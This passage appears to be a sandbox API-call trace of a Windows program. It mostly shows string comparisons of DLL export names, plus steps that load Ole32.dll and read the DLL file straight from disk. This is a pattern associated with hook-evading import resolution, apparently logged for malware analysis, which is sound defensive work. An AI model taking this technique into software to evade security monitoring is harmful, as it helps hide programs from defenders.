(lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0108.674] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0108.675] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0108.676] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0108.676] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0108.677] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0108.677] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0108.677] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0109.190] GetProcessHeap () returned 0x480000 [0109.190] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cb2010 | out: hHeap=0x480000) returned 1 [0109.202] GetProcessHeap () returned 0x480000 [0109.202] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499180 [0109.203] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0109.204] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0109.204] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0109.204] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0109.204] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0109.205] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0109.205] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0109.205] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0109.205] GetProcessHeap () returned 0x480000 [0109.205] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x142d00) returned 0x4074040 [0109.209] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0109.209] ReadFile (in: hFile=0x140, lpBuffer=0x4074040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4074040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0109.238] CloseHandle (hObject=0x140) returned 1 [0109.239] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0109.239] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0109.240] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0109.240] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0109.240] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0109.240] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0109.240] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0109.240] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0109.240] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0109.241] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0109.241] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0109.241] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0109.241] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0109.241] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0109.241] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0109.241] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0109.438] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0109.438] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0109.438] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0109.438] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0109.439] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0109.439] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0109.439] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0109.439] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0109.439] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0109.439] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0109.439] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0109.439] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0109.439] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0109.440] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0109.440] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0109.440] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0109.440] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0109.440] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0109.440] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0109.440] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0109.440] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0109.440] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0109.440] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0109.441] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0109.441] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0109.442] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0109.442] lstrcmpA 